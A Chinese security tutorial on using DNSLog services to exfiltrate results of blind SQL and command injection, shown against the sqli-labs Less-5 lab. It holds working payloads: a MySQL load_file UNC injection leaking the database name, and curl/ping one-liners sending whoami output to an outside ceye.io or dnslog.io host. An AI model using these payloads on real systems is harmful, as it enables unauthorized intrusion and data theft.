利用DNSLog实现无回显注入

本文涉及的产品
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
简介: 测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入

DNSLOG的原理


DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。



其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。


DNSLOG工具


如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:

https://github.com/BugScanTeam/DNSLog。


另外我们也可以使用在线平台:

http://admin.dnslog.link。

http://ceye.io。

https://dnslog.io/      

 

场景一:SQL盲注回显

原理:


不论是bool型盲注还是时间型盲注,都需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban。我们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()

不仅能够加载本地文件,同时也能对诸如\\www.test.com这样的URL发起请求。dnslog回显只能用于windows系统,原理就是'\\\\'代表Microsoft Windows通用命名规则(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个\就是转义了反斜杠。(UNC格式

\\servername\sharename ,其中 servername 是服务器名,sharename 是共享资源名)


用法:


在mysql命令行执行:select load_file('\\\\afanti.xxxx.ceye.io\\aaa');其中afanti就是要注入的查询语句


查看平台,dnsLog被记录下来。


举例:

以sql-labs第五关为例

payload:

' and if((select load_file(concat('\\\\',(select database()),'.xxxx.dnslog.io\\xxx'))),1,0) --+

http://192.168.43.128/sqli-labs-master/Less-5/?id=1%27%20and%20if((select%20load_file(concat(%27\\\\%27,(select%20database()),%27.g8r7q.l.dnslog.io\\abc%27))),1,0)%20--+

查看dnslog日志,发现security数据库被查询出来:

场景二:命令执行盲注回显

当 ping 一个域名时会对其进行一个递归 DNS 查询的过程,这个时候就能在后端获取到 DNS 的查询请求

curl http://haha.xxx.ceye.io/`whoami`
ping `whoami`.xxxx.ceye.io
Windows
ping %USERNAME%.xxx.ceye.io

 

 

除了上面详细列出的例子之外,DNSLOG还可以利用在诸如Blind XSS、Blind XXE和Blind SSRF之类的漏洞上,原理是一样的,这样就不演示了。

 

参考:

https://www.freebuf.com/column/184587.html

https://www.cnblogs.com/afanti/p/8047530.html


永远相信 永远热爱


相关文章
|
4月前
|
SQL 监控 安全
命令注入攻击
【8月更文挑战第17天】
93 2
sqli注入前置知识
sqli注入前置知识
|
7月前
|
数据库
Sqlmap是如何GET注入的
Sqlmap是如何GET注入的
58 0
|
Python
关于SSTI模块注入的常见绕过方法
关于SSTI模块注入的常见绕过方法
256 0
|
SQL 安全 搜索推荐
3.9 使用sqlmap进行ashx注入
3.9 使用sqlmap进行ashx注入
103 0
|
域名解析 网络协议 关系型数据库
DNS注入(诸葛亮:略懂,略懂)
本文为实战文章,环境全是自己搭建
|
SQL 数据库
SQL注入攻击(SQL注入(SQLi)攻击)-报错注入
页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式
162 0
SQL注入攻击(SQL注入(SQLi)攻击)-报错注入
|
SQL 安全 PHP
SQL注入(SQL注入(SQLi)攻击)攻击-注入点
SQL注入被称为漏洞之王 , 是最常用的漏洞之一 , 其中PHP在这方面的贡献最大
127 0
SQL注入(SQL注入(SQLi)攻击)攻击-注入点
|
SQL 数据库
SQL注入-报错注入
页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式
173 0
SQL注入-报错注入
|
SQL XML 数据库
SQL注入之错误注入_基于updatexml()
updatexml() 常用来修改xml文件的内容 updatexml(参数1 , 参数2 , 参数3); 参数1: 文件名 , 比如 a.xml 参数2: 路径 , 比如 contry->city1 ( 不允许特殊字符 ) 参数3: 数值 , 比如 tianjing
301 0
SQL注入之错误注入_基于updatexml()